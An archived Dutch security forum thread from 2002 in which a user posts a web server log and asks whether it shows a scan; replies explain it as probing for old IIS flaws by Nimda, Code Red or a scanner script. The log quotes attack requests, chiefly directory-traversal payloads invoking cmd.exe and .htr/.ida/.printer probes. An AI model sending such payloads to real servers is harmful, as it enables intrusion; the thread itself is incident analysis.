Archief - De topics van lang geleden

Is dit een log file van een scan ?

02-08-2002, 20:40 door Anoniem, 7 reacties
hi,

graag zou ik willen weten of onder staande een log file is van een router poort scan volgens mij wordt ik gewoon genaaid door @ onder staande leverde me een gele kaart op scannen van een router het lijkt er op dat deze router een IIS site host met JPG files. ik heb ze zo nog niet zo vaak gezien maar mogelijk zie ik het fout help me even uit de droom..

Reacties graag naar [email]fiberman@home.nl[/email]

17.10.13.22 - - [16/Jul/2002:19:15:49 +0200] "GET / HTTP/1.1" 200
1260
217.120.132.228 - - [16/Jul/2002:19:15:50 +0200] "GET /style.css
HTTP/1.1" 200 456
217.120.132.228 - - [16/Jul/2002:19:15:50 +0200] "GET
/images/seiback.jpg HTTP/1.1" 200 4817
217.120.132.228 - - [16/Jul/2002:19:15:51 +0200] "GET /images/anyb13.png
HTTP/1.1" 200 2381
217.120.132.228 - - [16/Jul/2002:19:15:54 +0200] "GET
/images/Assen2001_AlfaSei_front.jpg HTTP/1.1" 200 57967
217.120.132.228 - - [16/Jul/2002:19:16:25 +0200] "GET /main.html
HTTP/1.1" 200 2596
217.120.132.228 - - [16/Jul/2002:19:21:14 +0200] "GET / HTTP/1.0" 200
1260
217.120.132.228 - - [16/Jul/2002:19:22:16 +0200] "GET /asdfdsg2ggfds
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:16 +0200] "GET /rettest.ida
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:17 +0200] "GET
/scripts/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9
v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 287
217.120.132.228 - - [16/Jul/2002:19:22:17 +0200] "GET
/IISADMPWD/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0
%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 287
217.120.132.228 - - [16/Jul/2002:19:22:17 +0200] "GET
/msadc/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/
winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 287
217.120.132.228 - - [16/Jul/2002:19:22:17 +0200] "GET
/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9
v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 287
217.120.132.228 - - [16/Jul/2002:19:22:17 +0200] "GET
/_vti_bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%
9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 287
217.120.132.228 - - [16/Jul/2002:19:22:18 +0200] "GET /rettest.idq
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:18 +0200] "GET
/iisadmpwd/aexp2b.htr HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:18 +0200] "GET
/cgi-bin/htimage.exe?x=1&y=1 HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:18 +0200] "GET /iisstart.asp
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:18 +0200] "GET /default.asp
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:18 +0200] "GET /localstart.asp
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /index.asp
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /main.asp
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /start.asp
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /global.asa
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /iisstart.asp+.htr
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /default.asp+.htr
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET
/localstart.asp+.htr HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /main.asp+.htr
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /index.asp+.htr
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /start.asp+.htr
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /global.asa+.htr
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET /null.printer
HTTP/1.0" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 284
217.120.132.228 - - [16/Jul/2002:19:22:19 +0200] "GET
/officescan/cgi/cgiChkMasterPwd.exe HTTP/1.1" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:20 +0200] "GET /catinfo?A
HTTP/1.1" 404 142
217.120.132.228 - - [16/Jul/2002:19:22:20 +0200] "GET CUSTOM HTTP/1.0"
400 333
Reacties (7)
03-08-2002, 09:58 door Anoniem
Men kan in contact treden met het SANS-instituut. Op de volgende URL vimdt men een aantal e-mailadressen. Misschien dat zij u verder kunnen helpen:

http://www.incidents.org/faq/about.html

Sterkte.
Sep.
03-08-2002, 21:13 door Anoniem
Ziet er naar uit dat 217.120.132.228 op zoek is naar een aantal
wel bekende bugs in IIS. Dit is dus een scan, echter geen poortscan.
Het zou nimda kunnen zijn, dit zal je even moeten uitzoeken, wat de specifieke kenmerken van nimda zijn.
Jammer dat user agent e.d. niet gelogged zijn.
04-08-2002, 11:08 door Anoniem
het 217.120.132.228 is mijn eigen ip adres.
04-08-2002, 11:12 door fiberman
de gelekaart is voor het scannen van een Router. het ip numme rvan de router heb ik en het is de eerste hop die ik krijg als ik een tracert doe. ik ben me van geen kwaad bewust.

maar als je een poort scan gaat doen op een router dan ga je toch geen IIS bug scannen op een router.
05-08-2002, 13:42 door jroefs
Dit is inderdaad de logfile van een systeem dat bekeken wordt op reeds een jaar bekend zijnde IIS-problemen. Code-Red en Nimda gaven dit soort logs als ik het me goed herinner.

Als dat je eigen ip is --> misschien tijd om eens een AV-scan te doen!?
06-08-2002, 17:43 door Anoniem
Ik heb ook al gedacht aan CodeRed want ook deze worm staat erom bekend CMD.exe aan te spreken.

Pierpanda.
06-08-2002, 21:51 door Anoniem
Dat ziet er meer uit als een van de talloze (perl) scripts die de laatste maanden opduiken, nix worm.

Lijkt me dat je een ongenode gast aan boord had/hebt, met niet al te veel kennis van zaken.

Het meeste elaborate script dat ik tot nu toe ben tegengekomen 'doet' 1200 verschillende tests op vunerabilities op meerdere OS'es.

Lezen jullie Bugtraq en Usenetgroepen ?

Anyways,

Peaz
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.